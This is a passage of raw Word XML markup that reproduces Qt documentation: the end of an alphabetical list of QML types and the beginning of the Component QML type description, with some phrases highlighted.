                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineView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62" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebSocket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63" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebSocketServer</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64" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebView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65" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebViewLoadRequest</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66" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WeekNumberColumn</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67" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WheelEvent: QtQuick</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68" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WheelEvent: Qt3D</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69" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Window</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70" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WlShell</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71" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WlShellSurface</w:t>
              </w:r>
            </w:hyperlink>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72" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WorkerScript</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85" w:name="x"/>
            <w:bookmarkEnd w:id="1185"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>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73" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>XAnimator</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74" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>XmlListModel</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75" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>XmlRole</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76" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>XYPoint</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00B947D3" w:rsidRPr="000821BB" w:rsidRDefault="00490E7E" w:rsidP="000821BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1477" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>XYSeries</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00B947D3" w:rsidRPr="000821BB" w:rsidRDefault="00B947D3" w:rsidP="000821BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1186" w:name="y"/>
            <w:bookmarkEnd w:id="1186"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B947D3" w:rsidRPr="000821BB" w:rsidRDefault="00490E7E" w:rsidP="000821BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1478" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>YAnimator</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00B947D3" w:rsidRPr="000821BB" w:rsidRDefault="00B947D3" w:rsidP="000821BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1187" w:name="z"/>
            <w:bookmarkEnd w:id="1187"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Z</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B947D3" w:rsidRPr="000821BB" w:rsidRDefault="00490E7E" w:rsidP="000821BB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1479" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ZoomBlur</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B947D3" w:rsidRPr="00B947D3" w:rsidRDefault="00B947D3" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRDefault="00490E7E" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1480" w:history="1">
        <w:r w:rsidR="00DF758D" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/newclasses58.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRPr="00DF758D" w:rsidRDefault="00DF758D" w:rsidP="00592D36">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1188" w:name="_Toc483000777"/>
      <w:bookmarkStart w:id="1189" w:name="_Toc483003775"/>
      <w:bookmarkStart w:id="1190" w:name="_Toc483604129"/>
      <w:bookmarkStart w:id="1191" w:name="_Toc483605349"/>
      <w:r w:rsidRPr="00592D36">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>New Classes and Functions in Qt 5.8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1188"/>
      <w:bookmarkEnd w:id="1189"/>
      <w:bookmarkEnd w:id="1190"/>
      <w:bookmarkEnd w:id="1191"/>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRDefault="00DF758D" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF758D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This page contains a comprehensive list of all new classes and functions introduced in Qt 5.8. Links to new APIs in previous Qt 5 releases are found at the bottom of this page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00490E7E" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1481" w:history="1">
        <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qml-qtqml-component.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00592D36" w:rsidRDefault="00797B11" w:rsidP="00592D36">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1192" w:name="_Toc483000778"/>
      <w:bookmarkStart w:id="1193" w:name="_Toc483003776"/>
      <w:bookmarkStart w:id="1194" w:name="_Toc483604130"/>
      <w:bookmarkStart w:id="1195" w:name="_Toc483605350"/>
      <w:r w:rsidRPr="00592D36">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1192"/>
      <w:bookmarkEnd w:id="1193"/>
      <w:bookmarkEnd w:id="1194"/>
      <w:bookmarkEnd w:id="1195"/>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00592D36">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1196" w:name="_Toc483000779"/>
      <w:bookmarkStart w:id="1197" w:name="_Toc483003777"/>
      <w:bookmarkStart w:id="1198" w:name="_Toc483604131"/>
      <w:bookmarkStart w:id="1199" w:name="_Toc483605351"/>
      <w:r w:rsidRPr="00592D36">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detailed Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1196"/>
      <w:bookmarkEnd w:id="1197"/>
      <w:bookmarkEnd w:id="1198"/>
      <w:bookmarkEnd w:id="1199"/>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Components are reusable, encapsulated QML types with well-defined interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Components are often defined by</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1482" w:history="1">
        <w:r w:rsidRPr="003E1EBA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>component files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- that is,</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>files. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type essentially allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML components to be defined inline</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, within a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1483" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML document</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, rather than as a separate QML file. This may be useful </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for reusing a small component within a QML file</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or for </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
